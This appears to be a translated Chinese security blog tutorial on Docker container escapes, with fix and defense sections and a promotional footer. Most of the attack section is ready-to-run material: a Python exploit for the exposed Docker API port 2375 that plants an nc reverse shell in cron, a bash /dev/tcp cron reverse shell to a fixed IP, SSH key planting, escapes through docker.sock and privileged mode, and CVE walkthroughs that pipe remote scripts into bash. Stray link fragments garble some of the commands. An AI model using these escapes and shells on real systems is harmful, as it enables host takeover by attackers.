What is Docker?
Docker
is an open source application container engine that allows developers to package their applications and dependencies into a portable image, and then publish it to any popular Linux or Windows operating system machine, and can also implement virtualization. Containers use a sandbox mechanism completely, and there will be no interfaces between them.
A complete Docker consists of the following parts:
1. Docker Client client
2. Docker Daemon daemon process
3. Docker image image
4. Docker Container container
Docker architecture
Docker uses a client-server (C/S) architecture pattern and uses remote APIs to manage and create Docker containers. Docker containers
are created from Docker images. The relationship between containers and images is similar to objects and classes in object-oriented programming.
Docker uses the C/S architecture Docker daemon as the server to accept requests from customers and process these requests (creating, running, and distributing containers).
The client and server can run on the same machine, or communicate through socket or RESTful API.
Docker daemon generally runs in the background of the host host, waiting to receive messages from clients. The Docker client provides users with a series of executable commands, which users use to
interact with the Docker daemon.
Docker common commands
list mirrors
docker images
Make a list of containers
docker ps -a
Stop and delete containers
docker stop/rm [CONTAINER ID]
delete mirror
docker rmi [IMAGE ID]
PS: When deleting the image, you need to stop the running container first
query mirror
docker search [NAME]
get mirror
docker pull [NAME]
Interactive method to start the image
docker run -it [REPOSITORY] /bin/bash
access container
docker exec -it [CONTAINER ID] /bin/bash
exit container
exit/ctrl+p+q
How to determine whether the current machine is a Docker container environment
few processes
Some common commands cannot be used
Check if it exists in the root directory
.dockerenv file
In docker environment: ls -alh /.dockerenv
Non-docker environment, no .dockerenv file
use
Cat /proc/1/cgroup Whether there is docker related information
pass
mount Check whether there is docker related information on the mounted disk
Docker attack method
Escape caused by dangerous configuration of Docker
Security often develops through painful lessons. In these years of iterations, the container community has been working hard to implement concepts and principles such as "defense in depth" and "least privilege". For example, Docker has changed the Capabilities blacklist mechanism when the container is running to today's default prohibition of all Capabilities, and then uses the whitelist method to grant the container the minimum permissions required to run.
However, whether it is fine-grained permission control or other security mechanisms, users can narrow or expand the constraints by modifying the container environment configuration or specifying parameters when running the container. If the user provides some dangerous configuration parameters for the container that is not fully controlled, it provides a certain degree of escape possibility for the attacker, and sometimes the user is the biggest hidden danger.
docker daemon api unauthorized access vulnerability
Vulhub provides a vulnerability environment for docker daemon api unauthorized access vulnerabilities
[https://github.com/vulhub/vulhub/tree/master/docker/unauthorized-
rce](https://link.zhihu.com/?target=https%3A//github.com/vulhub/vulhub/tree/master/docker/unauthorized-
rce)
Compile and start the vulnerability environment:
docker-compose build
docker-compose up -d
After the environment starts, the port of the docker daemon api is port 2375
The method of utilization is that we start a container at will, and mount the host's /etc directory into the container, so that we can read and write files arbitrarily. We can write commands into the crontab configuration file to perform a reverse shell.
The exp of the rebound shell:
import docker
client = docker.DockerClient(base_url='[http://your-
ip](https://link.zhihu.com/?target=http%3A//your-
ip):2375/')
data = client.containers.run(‘alpine:latest’, r’‘‘sh -c "echo '* * * * *
/usr/bin/nc your-ip
21 -e /bin/sh’ >> /tmp/etc/crontabs/root" ‘’’, remove=True, volumes={‘/etc’:
{‘bind’: ‘/tmp/etc’, ‘mode’: ‘rw’}})
You can also directly use the exploit on github to attack
https://github.com/Tycx2ry/docker_api_vul
Repair plan
1. Close port 2375 (especially in the case of public network, this port must be disabled)
2. Configure the firewall to prohibit external network access to port 2375
Privileged privileged mode starts docker
Start the Docker container. When using the --privileged parameter, the container has full access to all devices and is not
restricted by seccomp, AppArmor and Linux capabilities.
Start a docker container in privileged mode
docker run -it --privileged centos /bin/bash
Check if the current container is a privileged container
cat /proc/1/status | grep Cap
If the query value is 0000000xffffffff, it indicates that the current container is a privileged container.
Check the disk file and find that the host device is /dev/sda1
fdisk -l
In privileged mode, directly mount the host disk in the container, and then switch the root directory.
Create a new directory: mkdir /mb
Mount the host disk to the newly created directory: mount /dev/sda2 /mb
Switch root directory: chroot /mb
Chroot is change root, which changes the location of the root directory referenced when the program is executed. Chroot can increase the security of the system and limit what users can do.
Create a scheduled task and bounce the host Shell
echo ‘* * * * * /bin/bash -i >& /dev/tcp/192.168.58.138/6666 0>&1’ >>
/mb/var/spool/cron/crontabs/root
Mount the root directory of the host to the container, and write the SSH private key to log in
docker run -it -v /root:/root centos /bin/bash
mkdir /root/.ssh
cat id_rsa.pub >> /root/.ssh/authorized_keys
Security issues related to startup parameters:
Docker implements 6 resource isolation through Linux namespace, including host name, user authority, file system, network, process number, and inter-process communication. However, some startup parameters grant greater permissions to the container, thus breaking the boundary of resource isolation.
–cap-add=SYS_ADMIN When starting, allow the mount privileged operation, need to obtain resources to mount for use.
--net=host Bypass Network Namespace on startup
--pid=host Bypass PID Namespace at startup
--ipc=host Bypass IPC Namespace at startup
Dangerously mount docker.sock inside the container
Invoke and execute the docker of the host machine in the docker container, and mount the docker file and docker.sock file of the docker host machine into the container, which can be understood as a nesting doll.
docker run --rm -it \
-v /var/run/docker.sock:/var/run/docker.sock \
-v /usr/bin/docker:/usr/bin/docker \
ubuntu \
/bin/bash
Find docker.sock in the container by find
find / -name docker.sock
View host docker information
docker -H unix://var/run/docker.sock info
Run a new container and mount the host root path
docker - H unix:///var/run/docker.sock run -it -v /:/mb ubuntu /bin/bash
In the /mb directory of the new container, you can access all the resources of the host
ls -to /mb
Execute chroot in the new container to switch the root directory to the root directory of the mounted host
chroot /mb
Successfully escaped to the host machine.
Escape caused by Docker program vulnerability
Shocker attack
Vulnerability description
Escape from a Docker container and read the contents of a file in a directory on the host. The key to the Shocker attack is the execution of the system call open_by_handle_at function. The Linux manual specifically mentions that calling the open_by_handle_at function requires the CAP_DAC_READ_SEARCH capability, while Docker version 1.0 uses a blacklist management strategy for Capability and does not limit the CAP_DAC_READ_SEARCH capability, thus causing container escape risks of.
The version affected by the vulnerability
Docker version 1.0, which existed in most versions before Docker 1.0 (basically will not exist now)
POC
https://github.com/gabrtv/shocker
runC container escape vulnerability (CVE-2019-5736)
Vulnerability description
The version of runc used in versions prior to Docker 18.09.2 is less than 1.0-rc6, which allows an attacker to rewrite the runc
binary file on the host, and the attacker can execute commands as root on the host.
The version affected by the vulnerability
Docker version 18.09.2, runc version 1.0-rc6, in general, you can view the current version through docker and docker -version.
POC
https://github.com/Frichetten/CVE-2019-5736-PoC
attack process
1. Vulnerability environment construction (Ubuntu 18.04)
Automatic construction
curl
https://gist.githubusercontent.com/thinkycx/e2c9090f035d7b09156077903d6afa51/raw-o
install.sh && bash install.sh
If docker pulls the image slowly, you can change the source by yourself
2. Download poc and modify and compile
git clone
https://github.com/Frichetten/CVE-2019-5736-PoC
modify paylod
vi main.go
payload = “#!/bin/bash \n bash -i >& /dev/tcp/ip/port 0>&1”
compile poc
CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build main.go
Need to install golang-go and gccgo-go in advance
3. Copy the compiled poc to docker
docker cp main 52fd26fd140f:/tmp
4. Run the main file in docker
5. The simulated administrator enters the container through exec and triggers the payload
sudo docker exec -it 52fd26fd140f /bin/bash
6. Successfully obtain the shell bounced back from the host
After the vulnerability is reproduced successfully, the docker container will be unavailable
Docker cp command container escape attack vulnerability (CVE-2019-14271)
Vulnerability description
When the Docker host uses the cp command, it will call the auxiliary process docker-
tar, which is not containerized, and will dynamically load some libnss*.so libraries at runtime. Hackers can inject code into docker-
tar by replacing libraries such as libnss*.so in the container. When a Docker user tries to copy a file from a container, malicious code will be executed, and the Docker escape will be successfully achieved and the root privilege of the host machine will be obtained.
The version affected by the vulnerability
Docker 19.03.0
attack process
[https://unit42.paloaltonetworks.com/docker-patched-the-most-severe-copy-
vulnerability-to-date-with-
cve-2019-14271/](https://link.zhihu.com/?target=https%3A//unit42.paloaltonetworks.com/docker-
patched-the-most-severe-copy-vulnerability-to-date-with-cve-2019-14271/)
Command Injection Vulnerability in Docker Build (CVE-2019-13139)
Vulnerability description
An attacker able to provide or manipulate the build path of the "docker build" command would be able to gain command execution. There was a problem with the way "docker build" handled remote git URLs
and caused command injection into the underlying "git clone" command, causing code to be executed in the context of the user executing the "docker build" command.
The version affected by the vulnerability
Versions prior to Docker 18.09.4
attack process
[https://staaldraad.github.io/post/2019-07-16-cve-2019-13139-docker-
build/](https://link.zhihu.com/?target=https%3A//staaldraad.github.io/post/2019-07-16-cve-2019-13139-docker-
build/)
Host Mode Container Escape Vulnerability (CVE-2020-15257)
Vulnerability description
Containerd is a daemon process that controls runC and provides a command-line client and API for managing containers on a machine.
In Containerd before version 1.3.9 and 1.4.0~1.4.2, when the network mode is host, the container shares a set of Network
namespace with the host, at this time the containerd-shim
API is exposed to the user, and Access control only verifies that the effective UID of the connecting process is 0, but does not restrict access to the abstract Unix domain socket, which happens to be that by default, the process inside the container is started as the root user.
Under the joint action of the two, the process inside the container can connect to the abstract Unix domain socket monitored by containerd-shim like containerd in the host, and call various APIs provided by containerd-shim, thereby realizing container escape.
The version affected by the vulnerability
containerd < 1.4.3
containerd < 1.3.9
attack process
1. Vulnerability environment construction
Use ubuntu 18.04 + metatarget to build (errors will occur when using non-18.04 ubuntu images)
git clone [https://github.com/brant-
ruan/metarget.git](https://link.zhihu.com/?target=https%3A//github.com/brant-
ruan/metarget.git)
pip3 insta[ll -r
requirements.txt](https://link.zhihu.com/?target=https%3A//github.com/brant-
ruan/metarget.git)
./metarget[cnv install
cve-2020-15257](https://link.zhihu.com/?target=https%3A//github.com/brant-
ruan/metarget.git)
2. Start the container
sudo docker run -it --net=host --name=15257 ubuntu /bin/bash
Execute the command cat /proc/net/unix|grep -a "containerd-shim" in the container to determine whether the abstract namespace Unix domain socket can be seen
3. Rebound the host's shell
The attack machine listens to port 6666, downloads the exploit tool [CDK] (https://link.zhihu.com/?target=https%3A//github.com/cdk-team/CDK/
), and transfers the CDK to the container tmp Under contents
sudo docker cp cdk_linux_amd64 15257:/tmp
Give the tool permission, run the tool, execute the reverse shell command, and successfully get a host shell
cd /tmp
chmod 777
./cdk_linux_amd64 run shim-pwn reverse attacker-ip port
Kernel vulnerability leads to Docker escape
DirtyCow Vulnerability Realizes Docker Escape (CVE-2016-5195)
Vulnerability description
Dirty Cow (CVE-2016-5195) is a privilege escalation vulnerability in the Linux kernel, through which the Docker container can escape and obtain a shell with root privileges.
Docker shares the kernel with the host, so the container needs to be in the host with the dirtyCow vulnerability
attack process
1. Download the container and run it
git clone [https://github.com/gebl/dirtycow-docker-
vdso.git](https://link.zhihu.com/?target=https%3A//github.com/gebl/dirtycow-
docker-vdso.git)
cd dirtyco[w-docker-
vdso/](https://link.zhihu.com/?target=https%3A//github.com/gebl/dirtycow-
docker-vdso.git)
sudo docke[r-compose run dirtycow
/bin/bash](https://link.zhihu.com/?target=https%3A//github.com/gebl/dirtycow-
docker-vdso.git)
2. Enter the container to compile the POC and run it
cd /dirtycow-vdso/
make
./0xdeadbeef ip:port
3. The listening port of the attack machine accepts the shell rebounded by the host machine
nc -lvvp port
Defense scheme for Docker containers
Restricting container permissions: When running a container, you can use command-line options or Dockerfile instructions to restrict access to the container, such as using the --cap-
drop option to prohibit the container from obtaining privileged mode. This reduces the attack surface.
Regularly update container packages: Keeping packages, libraries, and dependencies in containers up-to-date can fix known vulnerabilities and improve security.
Configure container networking: Protect containers from network attacks by configuring container networking to control communication between containers and restrict access to external systems.
Strengthen authentication and authorization: By setting strong passwords, using multi-factor authentication, and restricting access to specific users, you can strengthen the authentication and authorization mechanism of the container to limit unauthorized access.
Monitoring container health status: monitor the health status of containers in real time, quickly diagnose and respond to abnormal events, and avoid container failures caused by unknown vulnerabilities or attacks.
Apply security best practices: Following security best practices, such as using minimal images, enabling security audits, and using container image signatures, can further improve container security.
at last
For students who have never been exposed to network security, we have prepared a detailed learning and growth roadmap for you. It can be said that it is the most scientific and systematic learning route, and it is no problem for everyone to follow this general direction.
At the same time, there are supporting videos for each section corresponding to the growth route:
Of course, in addition to supporting videos, various documents, books, materials & tools have been sorted out for you, and they have been classified into categories for you.
Due to the limited space, only part of the information is displayed. Friends in need can [click the card below] to get it for free: